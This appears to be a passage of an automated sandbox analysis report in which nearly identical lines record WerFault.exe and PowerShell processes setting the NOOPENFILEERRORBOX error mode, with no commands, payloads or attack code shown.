Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
